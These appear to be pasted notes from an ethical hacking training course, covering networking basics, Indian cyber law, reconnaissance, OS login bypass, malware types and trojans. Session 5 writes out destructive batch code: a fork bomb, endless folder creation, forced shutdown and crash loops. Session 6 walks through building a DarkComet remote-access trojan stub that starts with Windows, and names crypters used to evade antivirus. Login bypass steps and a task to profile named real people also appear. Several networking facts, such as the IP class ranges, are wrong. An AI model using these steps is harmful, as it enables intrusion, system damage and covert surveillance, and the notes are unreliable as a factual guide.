· 6 years ago · Sep 01, 2019, 10:04 AM
1 =======
2 GRADE 1
3 =======
4
5
6
7 SESSION 1
8 =========
9
10INFORMATION SECURITY
11=====================
12
13DATA | INFORMATION
14
15Data : Raw Facts
16Information : Collection of Data.
17
18Information Security : Covering up all the security aspects related to Information Technology.
19-----------------------------------------------------------------------------------------------------------------------------------
20
21CIA TRIAD
22==========
23
241. CONFIDENTIALITY - That the data which is confidential and private should be secured from bad people.eg. - Aadhar Cards, Financial Records etc.
25
262. INTEGRITY - Dis-manipulation of data which should be secured from others. - accuracy. eg. chainging of any sensitive personal document.
27
283. AVAILABILITY - Availability simply means that some data should be available to specific persons onbly having access rights.
29
30
31-----------------------------------------------------------------------------------------------------------------------------------
32
33ETHICAL HACKING / CYBER SECURITY
34=================================
35
36Ethical - Means legal practices which should be performed.
37
38Hacking - Hacking means accessing any data, information or any system with or without the permission of individual.
39
40Hackers - Hackers are the most skilled and technical people who are profiecient in understanding the technical aspects.
41
42------------------------------------------------------------------------------------------------------------------------------------
43
44TYPES OF HACKERS
45=================
46
471. BLACK HAT HACKERS - THese are the bad people whon access and gain resources of any individual for the sake of there own wealth. Eg. Shadow Brokers
48
492. WHITE HAT HACKERS - THese are those people who gains access and tamper the resource for the sake of the individual. EG. Rahul Tyagi, Abhijeet Singh, Sanjeev Multani etc.
50
513. GREY HAT HACKERS - These are those hackers who hacks and gains resources for the sake of the society and culture.
52Eg. Anonymous, Edward Snowden etc.
53
54------------------------------------------------------------------------------------------------------------------------------------
55
56Other Categories
57================
58
591. Script Kiddies - These are those people who steals the programs, ideas or any other method of hacking and perform hacks without any knoweledge.
60
612. Noobz - These are the new born technical babies who just arrived in the field of cyber security.
62
633. Crackers - These are those people who are good in cracking into a particular machine or a authentication check.
64
65------------------------------------------------------------------------------------------------------------------------------------
66
67IMPACTS BLACK HAT HACKING
68==========================
69= Loss of respect, finance and other aspects.
70= Identity Theft
71= Leakage of Personal Resources etc.
72
73------------------------------------------------------------------------------------------------------------------------------------
74
75TYPES OF INFORMATION
76====================
77
781. Confidentials INformation - Aadhar Cards, Passwords, Birth Certificates, PAN Cards etc.
792. Financial Information - Financial Statements, Bank Details, Login Credentials for banking poractices etc.
803. Health Information - Policies, Diseases etc.
814. Personal Information - Address, Phone Numbers, DOBs etc.
82
83------------------------------------------------------------------------------------------------------------------------------------
84
85CYBER LAWS
86===========
87
88For Cyber Security Domain, there are acts which are called IT Acts, These acts are for preventing any malicious person black hat hacker to gain access to any system.
89
90The first act was launched and appreciated was IT ACT 2000. Which was having very less acts for the cybrr crimes which are being reported in the constritution.
91
92
93After a new act was launched IT AMENDMENT ACT 2008.
94
95
96- Section 43 / 43 A- Losses and damages which a person bear due to the harm of any computer.
97Improsinment - 1 year and fine is of 2,00,000. or both
98
99- Section 65 - It covers up the losses and damage of tampering and misuing of any source code.
100Imprisonment upto 3 years and Fine upto 200,000 INR. or both
101
102- Section 66 - Covers up all the Hacking Activities. Hacking with computer system dishonestly or fraudulently.
103 Imprisonment upto 3 years and Fine upto 500,000 INR.
104 - Section 66 A - If a person illegally hacks and gain access into a machine he/she will be arrested. Imprisonment upto 3 years and Fine upto 100,000 INR or both.
105 - Section 66 C - Identity Theft Crimes done by any individual. Imprisonment upto 3 years and Fine upto 100,000 INR or both.
106 - Section 66 F - Covers up all the activities which follows up with Cyber Terrorist.
107 Life Imprisonment, Fine of 10 Lac INR.
108
109- Section 67 - Covers up all the activvities having providding and leading obscene material and adult materials in a public domain.
110First conviction with imprisonment of three years and with fine five 5,00,000 INR or both.
111
112- Section 70 - Covers up all the activities having misleading and gaining access into Government Restricted Areas or Private Protected Access.
113Imprisonment of Ten Years and can also be liable to fine or both.
114
115- Section 71 - It covers up all the Misrepresentaion facts comes along with Identity, Data and other factors.
116Imprisonment for this is 2 Years, with fine of 1 LAC INR. or both.
117
118- Section 72 - Breaches of CIA Triad of electronic records.
119Imprisonment for Ten Years, or with fine, or with both.
120
121- Section 73 - Covers up all the practices covers and come along with Misleading of Digital Certificates and Signatures.
122Imprisonment for upto two years, or with fine upto 1,00,000 INR, or with both.
123
124--------------------------------------------------------------------------------------------------------------------------
125
126Basic Guide to IT Amendment Act 2008 - https://lucideustech.blogspot.in/2018/02/a-basic-guide-to-indian-it-amendment.html
127
128
129NATgrid and CERT-In, the two most Control Authorities to take action.
130
131
132----------------------------------------------------------------------------------------------------------------------
133
134
135TASK
136====
1371. Movies - Fifth Estate , Snoden
1382. Read on Vault 7.
1393. How Search Engine Works?
140
141
142WEBSITES TO FOLLOW : thehackernews.com , lucideustech.blogspot.in
143
144
145
146 SESSION 2
147 =========
148
149NETWORK TERMINOLOGIES - I
150=========================
151
1521. Physical Network
1532. Virtual Network
154
155
156Social Network: The network where people gather with each other to communicate and share their resources with each other.
157
158
159NETWORK - A network is a place where two or more peripherals or machines interact with each other while sharing their resources.
160
161
162TYPES OF NETWORK
163==================
1641. PAN - Personal Area Network - eg. Bluetooth etc.
1652. LAN - Local Area Network - eg. Organizations, Schools etc.
1663. MAN - Metropolitan Area Network - eg. - cyber city , cyber hub etc.
1674. WAN - Wide Area Network - eg. satelites
168
169
170NETWORK TOPOLOGIES
171====================
172
173Topologies mean architecture of the network.
174
175There are 5 Network Topologies
176
1771. Star Topology - All machines are connected through the use of the central connecting devices like router, hub, or switch.
178
1792. Ring Topology - All machines are connected in a closed chain or circular shaped sharing there resources unidirectional or bidirectional.
180
1813. Bus Topology - In this, all machines are connected in the form of a bus. eg. Small Corporate Networks
182
1834. Mesh Topology - The messy form of network interconnection.
184
1855. Hybrid Topology - 2 or more topologies are connected with each other.
186
187Disadvantages of Topologies. - Wireless Networks WIFIs came into existence.
188
189
190PROTOCOLS
191===========
192
193They are the rules and regulation OR guidelines for communication in a Particular network.
194For example, if two persons are playing table tennis, then both need to go and play by the same rules. None of them should go out of the rules. Likewise, if two devices need to communicate, they need to follow some basic rules. So for that, protocols are used.
195
196EG. Protocols in a school -
197
198Cleanliness, Polished Shoes, Cutted Nails, Ironed Shirt, School Uniform, Proper DResses.
199
200Well nounced Protocols examples -
201==========================
202
203IP - Internet Protocol
204TCP - Transmission Control Protocol - Sequential
205UDP - User Datagram Protocol
206HTTP - HyperText Transfer Protocol
207HTTPS - HTTP SSL
208ICMP - Internet Control Messaging Protocol
209DHCP - Dynamic Host Configuration Protocol
210SMTP - Simple Mail TRansfer Protocol
211IMAP - Internet Messaging Application Protocol
212POP3 - Post Office Protocol v3
213FTP - File Transfer Protocol
214
215
216
217INTERNET / INTRANET
218====================
219INTERNET is a "inter-connection" of networks which are connected to each other. All other people use their networks by sharing the resources of it with each other.
220
221INTRANET is a network which is a standalone network and not connected to any other network.
222
223ISP - INTERNET SERVICE PROVIDER - IDEA , JIO ETC.
224
225TYPES OF ADDRESSES IN A PARTICULAR NETWORK
226===========================================
2271. Logical Address/ Virtual address - These address are given to us by the router or isp which can be changed and unique for every network. - IP Address
228
2292. Physical Address - THese addresses are those which are given us by the manufacturer of your machine through its Network Interface Card. - MAC - Media Access Control
230
231
232
233IP ADDRESSES
234==============
235
236IP Address is a virtual address, which is unique in a particular network. It is necessary for devices to communicate with the other devices.
237
238VERSIONS IP ADDRESSES
239=======================
240
2411. IPV4 - 32 BIT ADDRESS - THese were the NUmerical IP Address which is described by a decimal and divided into an octet differentiated by a period. And in a Particular Network, there can be 2^32 IP Addresses.
242
243EG. - 192.168.0.54
244 X.X.X.X
245
246DEFINED IN BINARY VALUES - 0 & 1
247
248192 = 11000000
249168 = 10101000
250
251
252 128 64 32 16 8 4 2 1
253 192= 1 1 0 0 0 0 0 0
254 168= 1 0 1 0 1 0 0 0
255
256
257
258
2592. IPV6 - 128 BIT ADDRESS - these addresses are defined in the form of hexadecimal values.
260
261eg. fe80::ab35:75cd:7ac3
262
263HEXADECIMAL - 0-9, A-F
264
2650 A
2661 B
2672 C
2683 D
2694 E
2705 F
2716
2727
2738
2749
275
2762^128 addresses - solution to the shortage of ipv4 addresses - IPV6
277
278Additions from ipv4
279= Encryption
280= Tunneling
281
282IP ADDRESS which is not connected to any network is called Loop Back Address/Localhost, and that address is "127.0.0.1".
283
284
285TYPES OF IP ADDRESSES
286======================
287
2881. Private IP Addresses - THese IP Addresses are those which are given us by the router to our machine. for eg. - 192.168.0.54
289
2902. Public IP Addresses - THese IP Addresses are those which are given to the router by the ISP.
291
292Where to find them?
293Private IP Address - Windows - CMD - "ipconfig" - IP configuration (ipconfig /all)
294 UNIX/LINUX -CMD - "ifconfig" - Interface Configuration
295
296PUBLIC IP Address - Google - my ip address,
297 http://ipcow.com/
298 ipchicken.com
299
300
301User Information
302=============
303
304125.63.71.34
305Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
306Hostname = 125.63.71.34.reverse.spectranet.in
307Device = X11
308Operating System = Ubuntu
309Browser Name = Firefox
310Browser Version = 58.0
311Is Mobile Device = False
312Is Beta = False
313Is Crawler = False
314Screen Resolution = 1024 x 768
315Window Size = 1024 x 741
316
317
318
319IP CLASSES
320===========
321
322CLASS A - 127.0.0.1-128.255.255.255 - - ORGANIZATIONS
323CLASS B - 128.255.255.255-191.255.255.255 -- ORGANIZATIONS
324CLASS C -192.255.255.255 - 223.255.255.255 - PRIVATE LOCAL
325CLASS D - 224.255.255.255 - 239.255.255.255 - OTHER
326CLASS E - 240.255.255.255 - 254.255.255.255 - OTHER
327
328
329ROUTER - GATEWAY. The Private IP Address of a Gateway or a Router is 192.168.0.1 / 192.168.1.1 in most of the cases.
330
331
332IP CATEGORIZATION ON THE BASIS OF ASSIGNING
333============================================
334
3351. Dynamic IP Address - Randomly Generated IP Address by the Router.
3362. Static IP Address - THese IP Addresses are defined by you only on the network configuration according to the network.
337
338Priority to Static IP Address as compared to Dynamic IP Addresses.
339
340SUBNET OR SUBNETTING
341=====================
342Subnet is a subpart of a network.
343
344SUBNETTING = Dividing a particular network into different sub parts.
345
346Syntax - 192.168.0.1/24 - THis depicts all the IP Addresses in a particular Subnet.
347
348For eg. = 192.168.0.1 - 192.168.0.255
349More people will come ?? - SUBNETTING
350Solution - 192.168.1.1- 192.168.1.255
351
352
353ALL THESE IPs TO EVERYONE ALL OVER THE GLOBE ARE PROVIDE BY A ORGANIZATION NAMED AS "IANA" - internet assigned number authority which allocated global IPs to everyone.
354
355
356NAT - Network Address Translation
357==================================
358
359This is a function which converts my Public IP Address to my Private IP Address and vice versa. -> NAT (Vmware)
360
361
362DHCP AND DHCP SERVER
363=====================
364DHCP is Dynamic HOst Configuration Protocol which assigned us the dynamic IP to our machine randomly with the help of a SERVER aka DHCP Server. It is situated inside the router.
365
366DHCP POOL - Consist all the Network IP's from which they assigned us Dynamic IP to Our Machine.
367
368IP Lease Time - the Alive time of the IP Address.
369Mobile: DHCP Configuration
370Router: DHCP
371
372
373TASK
374====
375
376- What happened to IPV5?
377- Static IP Addresses - Win 7 VM
378- How Does Torrent work?
379
380https://lucideustech.blogspot.in/
381https://thehackernews.com/
382
383
384
385 SESSION 3
386 =========
387
388NETWORK TERMINOLOGIES II
389========================
390
391PORTS
392======
393
394A port is an endpoint of communication in an operating system. In the computer networking system a computer or a program connects and run the services on the Internet via a port. They are the gateways through which we access any service of any system.
395
396THere are 2 TYpes of Ports Basically-
397
3981. Hardware or Physical Ports - The ports which helps to connect the hardware components to our computer.These are the ports which are tangible and we can see and use the into a particular system. For eg. USB Port, HDMI, VGA Port.
399
4002. Virtual or Logical Ports - These are those ports which are not tangible and used to run a service in a Computer Networking System. For every service or protocol there is a unique port number assigned to it which helps in processing it. SO these are the ports which are virtually located in a system or a machine to access some services of the system but is not visible and virtually located.
401
402There are a total of 65,535 POrts in a particular system.
403
404Categories of Virtual and Logical Ports
405=========================================
406
4071. Well KNown and Pre-defined Ports - THese are those which are used for all the well knowned Services like which are used all over the globe.
408EG. FTP - 21
409 HTTP - 80
410 HTTPS - 443
411 SMTP - 25
412 POP3 - 110
413 UDP - 53
414 SSH - 22
415 TELNET - 23
416
417Range - 0 - 1023
418
419
4202. Registered Ports - THese ports are those which are basically used by software organizations to run there services.
421Eg. MYSQL - 3306
422 ITUNES - 1609
423 MS-RDP - 3389
424 ORACLE - MYSQL - 3306
425 DARK COMET - 1604
426 Team Viewer - 1609
427
4283. Dynamic or Standalone Ports - THese ports are those which are used by anyone for there personal purposes.
429For eg . 48,897
430
431Range Of Ports
432===============
433
434WEll KNown Ports - 0-1023
435Registered Ports - 1024 - 41,951
436Dynamic Ports - 41,952-65,535
437
438-------------------------------------------------------------------------
439
440DNS
441====
442
443THE COMPUTER ONLY UNDERSTANDS THE LANGUAGE OF NUMBERS.
444CHROME - "WWW.FACEBOOK.COM"
445Language - Binaries - 0&1
446
447Domain Name System is a Technology which converts a Domain Name into IP Address or a Number and Vice Versa.
448Because it is difficult to learn a IP Address for a website for a layman. for eg. learning "247.116.25.195" for "www.google.com" .
449
450"Ping" - "ping www.google.com"
451
452"Tracert" - Trace Routes of the desitination with hops.
453
454https://www.youtube.com/watch?v=2ZUxoi7YNgs
455
456-------------------------------------------------------------------------
457
458PROXIES AND VPN
459=================
460
461PROXY / PROXY SERVERS
462======================
463Proxy are the Dummy Servers which helps us by allocating an IP Address of themselves to us which is for temporary basis.
464It acts as a middle man between DNS server and client accessing it.
465THey alocate a IP Address of any location, and give us the permission to access the web service which is blocked.
466
467To find out the loaction of a Global IP - "ip2location.com"
468
469Proxies are of 3 Types
470========================
471
4721. Web Based Proxy or Proxy Servers - These are the Websites which are acting as a Proxy Server and allows to act as a intermediater between client and server.
473For eg. - kproxy.com
474 ninja proxy etc.
475
4762. Web Extension Based Proxy - THese are the Proxy Servers Client Agents which are enabled in our browser and helps to as behaving like a proxy dummy server.
477
478For eg. Anonymox, Hola Proxy Extension etc.
479
480----------------------------------------------------------------------
481
482VPN - VIRTUAL PRIVATE NETWORK
483==============================
484Virtual Private Network is more advanced technology which allows authorized clients to access the Virtually Created Network which will be safe and set the anonymity of a person. They are most advanced then proxies and basically a new virtual network created by organizations or anyone for there personal usage.
485
486THey are only can be accessed by authorized people only usually in corporates for accessing there confidential resources..
487
488More Functionalities that Proxies:
489= Tunneling of data - So that there can be a secret passage which will not be known to anyone.
490= Encryption of Data- It encrypts or make the data in the unreadable format.
491= It gives you better functionalities of networking.
492= Authorization and Authentication - Only authorized people can access it.
493
494Eg. PROXPN, VPNBOOK.COM , free of cost
495------------------------------------------------------------------------
496
497Standardisation Followed for commiunication into a Particular Network
498
499OSI REFERENCE MODEL
500====================
501
5021. Physical Layer - Wired / Wireless, Bitwise conversion of data
5032. Data Link Layer- MAC Addressing
5043. Networking Layer - LOgical Addressing and IP Fragmentation
5054. Transport Layer - Define the Port Addressing and Routing Architecture
5065. Session Layer - Existance of a particular Session created by the Application.
5076. Presentation Layer - Bit Conversion and Fragmentation of data packets
5087. Application Layer - UI of any application -Whatsapp etc.
509
510or
511
512Physical Layer - Way of transmitting the day, - peripherals
513Data Link Layer - Identifies the Hardware Address - MAC Address, Fragmentation and De-fragmentation of data
514Network Layer - Logical Address - IP Address, Topologies, TCP/UDP
515Transport Layer - Routing Mechanism, Port Addressing
516Session Layer - TimeStamp of transmitting the data, QOS
517Presentation Layer - Works on Segmentation as well as Window Framing
518Application Layer - User Interface of the Application
519
520
521Not Feasable
522------------------------------------------------------------------------
523
524TCP/IP MODEL
525=============
526
5271. Physical Layer / Network INterface = Physical + Data Link Layer
5282. Network Layer / INternet Layer
5293. TRansport Layer
5304. Application Layer = Session + Presentation + Application Layer
531
532------------------------------------------------------------------------
533
534WEB TECHNOLOGY BASICS
535======================
536
5371. Web Hosting Space - ICANN - GoDaddy, Bigrock etc.
5382. Domain Name - .com/.in/.net
5393. Database - Where all the data get stored in a server
5404. Server Type - Windows based servers, Linux Servers
5415. Clients and Server Architecture
5426. WEb Technologies - HTML , PHP , JSP , ASP etc.
543
544------------------------------------------------------------------------
545
546TASK
547=====
548
5491. How does Search Engine Works? Spiders? Crawlers?
5502. https://www.google.co.in
551 https
552 :
553 //
554 www
555 .
556 google
557 .
558 co
559 .
560 in
5613. Create a Table of 10 Well Keown Ports and Registered Ports.
5624. Comprision between OSI and TCP/IP Model.
563
564
565
566 SESSION 4
567 =========
568
569PHASES OF HACKING
570==================
571
572There are particular 5 Phases which depicts how to gain access to a particular system. these are
573
5741. INFORMATION GATHERING (Reconaissance)
5752. SCANNING (OS, IP, MAC etc)
5763. GAINING ACCESS
5774. MAINTAINING ACCESSS
5785. COVERING TRACES
579
580Information Gathering + SCanning = Pre Attacking Phase
581Gaining Access = Attacking or Exploitation Phase
582Maintaining Access + Covering Traces = Post Exploitation Phase
583
584INFORMATION GATHERING OR RECONNAISSANCE
585=======================================
586
587Information Gathering is an act where we gather and extract as much information as we can about our victim. The Victim can be a Network, a Machine, A website or a individual. The Information we gather in the Reconnaissance Phase will helps us that which approach to follow for attacking into the Target whether it is a Network, a Web Application or a Individual.
588Maximum we know about the Target, Maximum will be the chances of Successful Exploitation.
589
590Need and Motive of Information Gathering
591=========================================
592
593We gather information about the victim so that we plan our attack according to the Information gathering report.
594
595TYPES OF INFORMATION GATHERING
596===============================
597
5981. WEB BASED INFORMATION GATHERING : It tells us about the services and the identity of the website and its owner related to other details. The information can be about the services of the Website it is using, what are the directories a Web Application is having, Server type whether it is using a Shared Server or a Dedicated Server etc.
599
600
601Useful Tools -
602
603 https://whois.icann.org/en , https://whois.domaintools.com/, https://mxtoolbox.com/
604
605Whether the website is using dedicated server or shared server.
606
607Dedicated Servers are only for those websites of a particular owner.
608Shared Servers are those which are sharing multiple websites.
609Eg. of Shared and Dedicated - Shared PG Rooms , Dedicated Own Bunglaw.
610
611Tool - www.yougetsignal.com
612
613- Robots.txt
614
6152. NETWORK BASED INFORMATION GATHERING
616=======================================
617It tells us about the information about the clients and a particular network those clients who are connected. This phase of Information Gathering tells us the IP Addresses and the MAC addresses along with other details like OS, Services they are using and Ports they are using.
618
619Tools - AngryIPScanner , Softperfect Network Scanner, Cain&Able, Nmap etc.
620
621Advanced tools - GFI Languard, Nmap (These will be followed later on).
622
6233. INDIVIDUAL INFORMATION GATHERING
624===================================
625We collect data and information about a specific person which can be of any location. These can be done through multiple tools.
626
627Other ways of Information Gathering
628===================================
629
630Human Specific -
631
632 Social Network
633 Social Networking Websites
634 Linkedin
635 Twitter
636 Facebook
637 Dating Websites
638 Matrimonial Websites
639 Job Portals
640 Fake Surveys
641 Spy Services
642
643= Through some Social Networking Sites : facebook , instagram, twitter, gmail+, linkedin - resume, contact details etc.
644
645= Through some Smart Applications : TRuecaller , Hackode etc.
646
647= Through Online Portals : Shaadi.com , Naukri.com, Shine.com, Indeed.com, jantakhoj.com , pipl etc.
648
649= Through some fake emails : https://temp-mail.org/ , https://www.guerrillamail.com/inbox
650
651= Through some Tools : Maltego , HTTrack- Website Copier etc.
652
653------------------------------------------------------------------------
654
655Digital Footpriniting
656======================
657Digital Footprinting is process in which we left some traces and some tracks or in other words "footprints" of ourselves while using some internet servcices and left these traces and tracks on the internet. These information can be transmitted online, such as forum registration, e-mails , uploading videos or digital images etc.
658
659------------------------------------------------------------------------
660
661OS LOGIN BYPASS
662================
663Nowadays everyone use OS login on there Machine and as our Victims's. THese steps will tell you on the basis of scenario's that how to enter and crack into a particular operating system.
664
665
666Types Of Passwords
667===================
668
6691. Power On Password : These are the authentication used before booting up the system and starts on when we press the power button.
670
6712. BIOS / Supervisor Password : BIOS authentication occurs when we boot up our operating system and before our OS is ready.
672
6733. OS Passwords : These Passwords are nowadays mostly used and cracked by the attackers.
674
675
676METHODS OF OS LOGIN BYPASS
677===========================
678
6791. Online Method : This method carries out when the Operating Machine of the Victim is running and active. We crack the password or create a new user while not knowing the current password.
680
681SAM
682===
683SAM stands for Security Accounts Manager is file in Windows Operating System which carries all the users passwords in that but encrypted in NTLM Hashes.
684
685C:\Windows\System32\SAM
686
687LOCAL GROUP POLICY USER EDITOR
688==============================
689It is a console given by Microsoft which helps in accessing all the users account configuration in Windows Operating Systems.
690
691STEPS
692=====
693
694= My Computer > Right Click > Manage
695= Local Group and Users > Right Click > Create New User
696= Enter entities of new user
697
698THROUGH CMD
699===========
700
701= CMD > net user
702= CMD > net user username *
703= Restart
704
705
706Alternative of saving from Online Method :
707
708SYSKEY
709======
710It is a technology which enables a level of authentication and encrypts your SAM file by 128 bit encryption of RC4.
711
712
7132. OFFLINE METHOD
714==================
715This is the scenario where the Machine of a Victim is already locked and we don't know the password. WE access the machine through some Third Party tools such as Hiren Boot or Kon Boot etc.
716
717LIVE OPERATING SYSTEMS
718======================
719Normally OS loads from internal storage which is located inside your Machine only. Live Operating Systems are those which are installed ore placed in some kind of external storage like cd, dvd, usb etc.
720
721Requirements
722============
723== Boot a USB with some Bootable Softwares like Rufus and installing Kon Boot or Hiren Boot in that.
724== Plugging the USB Drive into the Victim's Machine for getting the access of the machine.
725
726
727ALTERNATIVE FOR OFFLINE METHOD : BIOS LOCK - But it can be cracked by removing the BIOS Chip or with the tool OPHcrack.
728
729-------------------------------------------------------------------------------
730
731Bypassing Login of Kali Linux :
732
733Linux :Bypassing Kali Linux Password
734Step 1: Select Recovery MODe Press E
735Step 2: Change ro to rw and add init=/bin/bash at the end of line and Press F10
736Step 3: Reset password by typing passwd root and press enter
737Step 4: Type new password and restart the system
738
739-------------------------------------------------------------------------------
740
741Bypassing Ubuntu System Password :
742
743Step 1: Go to Safe mode
744Step 2: Recover Mode
745Step 3: Select the second last option from the list i.e SHELL
746Step 4: type passwd root
747Step 6: Give the new password and confirm password and restart the machine.
748Step 7: Fill the new password
749
750
751SAM FILE CRACKING VIA CAIN N ABLE : https://lucideustech.blogspot.com/2018/05/sam-file-decryption-with-cain-n-abel.html
752
753
754TASK
755====
756
7571. Rainbow Table
7582. Scan a Network through AngryIPScanner and create a Report on it.
7593. Scan a Network through AngryIPScanner and create a Report on it.
7604. Scan Information about Saket Modi | Vidit Baxi using Maltego and create a Report of it.
7615. How does Torrent Works?
762
763
764
765 SESSION 5
766 ==========
767
768MALWARES
769=========
770The term MALWARE derives from "MAL+WARES" which means Malicious Software.
771Malwares are the programs, tools, codes or programs that can affect your computer system with or without your permission and can harm you in any way as they want. They can be in any format whether in the form of image , video , executable file, text file etc.
772
773IMPACT OF MALWARES
774==================
775
776= It can steal your data
777= Can consume your resources such as Processor, RAM , Harddrive space etc.
778= It can do identity theft
779= Can take REMOTE CONTROL of your machine
780= Can steal your money and confidential data and destroy your machine
781= Can create junks of file and fill your Machine etc.
782
783TYPES OF MALWARES
784=================
785
7861. Viruses
7872. Worms
7883. TRojans
7894. Ransomwares
7905. Adwares
7916. Spywares
792 6.1 Keyloggers
7937. Botnets
7948. Rootkits
795
796
7971. VIRUS
798========
799VIRUS stands for "Vital Information Resource Under Seize"
800THese are the implanted codes or programs which needs human assistance to initiate or execute so that they can get triggered on a particular machine. THey can't be replicated without any human assisstance.
801
802Types
803=====
8041. Boot Sector Viruses : These are those which are implemented in the BIOS or Boot menu of the machine.
8052. Directed Viruses : THey just get initiated with the help of self executable codes.
8063. PolyMOrphic Viruses : These are the viruses which changes its signature every time when they are executed.
807
808"www.virustotal.com"
809
810BATCH FILE VIRUS CREATION
811=========================
812= which will create a folder
813
814 mkdir hahaha
815
816= create a folder inside a folder---- infinite times
817
818 :loop
819 mkdir test
820 cd test
821 goto loop
822
823= To Create infinite folder with different name
824 :loop
825 mkdir %random%
826 goto loop
827
828= To Create a file
829 echo "hi, you are hacked?">>hack.txt
830
831= Shut Down Virus
832 shutdown -s -t 10 -c "Hacked By Grade 1 Hackers"
833
834= To make system Crash
835 :loop
836 run cmd.exe
837 start notepad.exe
838 start calc.exe
839 start explorer.exe
840 goto loop
841
842= Fork Bomb
843 %0|%0
844
8452. WORMS
846========
847Worms are those malicious softwares which replicates into a network without any human assisstance. If a attacker is connected to a network and he/she ececutes the worm in his/her own machine it will start its working by replicating.
848EG. Stuxnet , Conficker worm
849
8503. TROJANS
851===========
852A Trojan is a malicious program which gives you the access of the victim machine's remotely. It is created by RAT Tools (Remote Administration Tools) and we can perform any operation on the Victim machine as we want.
853
8544. RANSOMWARES
855==============
856Ransomwares are those Malicious Softwares which encrypts all of the data from your peronal computyer system and ask you for the ransom in term of digital currency. eg . Wannacry, Petya Ransomwares.
857Petya Demonstration
858
8595. ADWARES
860==========
861These are those malicious softwares which acceessed to our machine through globally hosted ads.
862Eg. Malwares from Torrents
863
8646. SPYWARES
865===========
866Spywares are those deadly Malicious Softwares which are designed to spy on your Machine whether located locally or globally.
867
868 6.1 KEYLOGGERS
869 ===============
870 Keyloggers are the malicious programs which are used to capture the keystroke of a particular Victim Machine whether stored globally or locally.
871
872 Eg. Ardamax Keylogger, Family Key Logger - Spyarsenal, Refog KeyLogger
873
874 Categories
875 ==========
876
877 Screenshoter : It takes screenshot on every single keystroke you enter.
878
879 Screenrecoder : It records in the form of videos.
880
881 Key Scrambler : It changes the poatern of the keyboard everytime you enter a keystroke.
882
883 Types of Keyloggers
884 ===================
885 1. LOcal Based Keyloggers : THese are those keyloggers which saves the Keystrokes on the Local Machine of the Victim. You have to access the Victim's Machine to capture the Keystrokes.
886
887 2. Server Based/Remote Keyloggers : These are those keyloggers which sent keystrokes to a server through internet globally. A attacker can access the keystrokes globally by accessing the Keylogger Server.
888
8897. Botnets
890==========
891Botnets = RoBOT+NETworks
892Botnets are those malicious smart programs which runs on the network globally and can provide harm to the clients situated to that networks.
893Eg. Zeus Botnet etc.
894
8958. Rootkits
896============
897These are those Malicious programs which get stored in the Kernal level or Boot sector level of the Operating systems.
898
899--------------------------------------------------------------------------------------------------
900
901
902TASKS
903=====
9041. Report on Conficker Worm
9052. Create a DDNS from NOIP
9063. Demonstration of any Local Based Keylogger
907
908
909
910 SESSION 6
911 =========
912
913TROJANS
914=======
915Trojans are the malicious applications or programs which looks like a normal application but is harmful in nature as it can give the whole remote access of the Target's Machine to the Attacker's Machine.
916
917TYPES OF TROJANS ON THE BASIS OF CONNECTION
918===========================================
919
920Reverse Connection Trojan : A reverse connection trojan is that in which we don't have to get or know the IP Address of the Victim's Machine. You just have to create a trojan having the Attacker's IP Address only.
921
922----------------------------------------------------------
923
924DEPLOYING OF TROJAN IN THE TARGET'S MACHINE
925===========================================
926
9271. DEPLOYING IN THE SAME NETWORK : The attacker just have to create a Trojan of the IP in the same network where a Target is residing.
928
9292. DEPLOYING TROJAN GLOBALLY : In this Scenario, a Attacker is using a Globally hosted DNS with a global IP to get a reverse connection from a Target to itself. For eg. Using NOIP and Port Forwarding.
930
931----------------------------------------------------------
932
933RAT
934===
935RAT stands for Remote Administration Tool. It helps in creating Malwares like Trojans and Viruses which provides Remote Connection of a Victim Machine while not letting know the Victim about it.
936
937----------------------------------------------------------
938
939CREATION OF TROJANS
940===================
941
942= IP + PORT = Socket
943= Stub = The Malicious Trojan we make through Dark Comet.
944
9451. Left top corner = DarkComet-RAT
9462. Go to "Server Module" = Full Editor(expert)
9473. Main Settings = Process Mutex
948 Mutex = Thread which helps me in sharing the computer's resources
949 Random Process Mutex
950 Server ID = Same|Change
951 Profile Name = Same|Change
9524. Goto Network Setting
953 Insert Private IP Address and a port number(greater than 1200)
954 Socket = IP Address + Port Number
955 IP Address = Private IP Address --> 192.168.0.28
956 Port Number = 1604
957 CLick On "ADD"
9585. Goto "Module Startup" = When my computer start, then what are the things which my trojan will do.
959 Check box the "Start the stub with windows"
960 Drop the stub in:
9616. Goto Install Message
962 Tick the check box
963 Choose the icon
964 Enter the you want the user to display
9657. Goto Module Shield
9668. File Icon
967 Choose any file icon from the list.
9689. Goto Stub Finalisation
969 Build This Stub
970 Destination for saving the stubb
97110. To listen on a specific port
972 port = 1604
973 In the dark comet screen, top left corner = DarkComet-RAT = Click on that
974 Click on "Listen to new port"
975 enter the port number = 1604 and click on listen
976
977
978EVADING ANTIVIRUSES AND ANTIMALWARES
979====================================
980
981HOW ANTIVIRUSES WORKS
982=====================
983Antiviruses and Antimalwares works on the definations or ccalled signatures of an application. If they found that a Signature of a Application is malicious, they will declare the application as a malware and if not they will declare it as a normal running application.
984
985https://www.youtube.com/watch?v=bTU1jbVXlmM
986
987FUD - Fully Undetectable
988
989
990CRYPTERS AND BINDERS
991====================
992Crypters are cthose applications which helps as a extra coating layer to an application providing there own self generated "Signatures". Eg. CHrome Crypter, Urge Crypter
993
994Binders are those applications which binds a file or a malware in any extension while not changing the functionality of the filetype.
995
996Chrome & Urge Crypters = Limbo > Bingo
997
998----------------------------------------------------------
999
1000BOTNETS AND ROOTKITS
1001====================
1002
1003Botnets means roBOT+NETwork. THese are the malicious applications such as TRojans etc.. which runs on the Network and are intelligent enough to use there own mechanism.
1004
1005Rootkits
1006========
1007Rootkits are those Malicious Applications or Codes which are installed in the Boot option such as BIOS and start executing on every startup.
1008
1009---------------------------------------------------------
1010
1011SECURE SYSTEM CONFIGURATION
1012===========================
1013
10141. CMD > $ netstat -ona
1015(This will show all the Sockets : IP+Port Connections with their Stats of that particular machine)
1016 = o stands for outgoing connections
1017 = n stands for network IPs & Ports
1018 = a stands for all connections
1019
10202. CMD > tasklist
1021 CMD > $ taskkill /PID ___ /F
1022
10233. Startups Check and Maintaining the list of the Machine.
1024
10254. Task Manager > Processes > kill PID (Process ID) of the Malicious Executable(exe)
1026
10275. Checking Firewall status and making and creating new Rules Sets. > Outbound Rules & Inbound Rules
1028
10296. Services running on the Machine.
1030
1031
1032TASKS
1033=====
1034
10351. Create a POC by making a Stub and getting the Remote Connection of a Machine.
10362. Find an application which can see the "Established" and "Listening" connection of a machine just like "netstat".
1037
1038PHONE NUMBER - 7500901015
1039EMAIL - sanjeev.m@lucideustech.com
1040
1041
1042
